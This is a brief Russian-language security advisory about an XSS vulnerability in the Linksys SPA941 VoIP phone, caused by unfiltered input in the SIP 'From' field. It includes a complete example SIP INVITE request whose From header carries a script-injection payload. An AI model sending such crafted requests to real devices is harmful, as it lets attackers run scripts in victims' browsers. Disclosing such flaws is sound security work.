Программа: Linksys SPA941 VoIP Phone
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных передаваемых в поле "From" SIP сообщения. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
INVITE sip:h at 192.168.1.3 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.9:5060;rport
To: sip:h at 192.168.1.3
From: "<script>alert('hack')</script>""natraj"
<sip:natraj at loria.fr>;tag=002f000c
Call-ID: 401010907 at 192.168.1.9
CSeq: 4857 INVITE
Content-Type: application/sdp
Subject: sip: natraj at loria.fr
Contact: "natraj" <sip:192.168.1.9:5060;transport=udp>
Content-Length: 214
v=0
o=root 47650 47650 IN IP4 192.168.1.9
s=session
c=IN IP4 192.168.1.9
t=0 0
m=audio 5070 RTP/AVP 3 0 110 5
a=rtpmap:3 GSM/8000/1
a=rtpmap:0 PCMU/8000/1
a=rtpmap:110 speex/8000/1
a=rtpmap:5 DVI4/8000/1
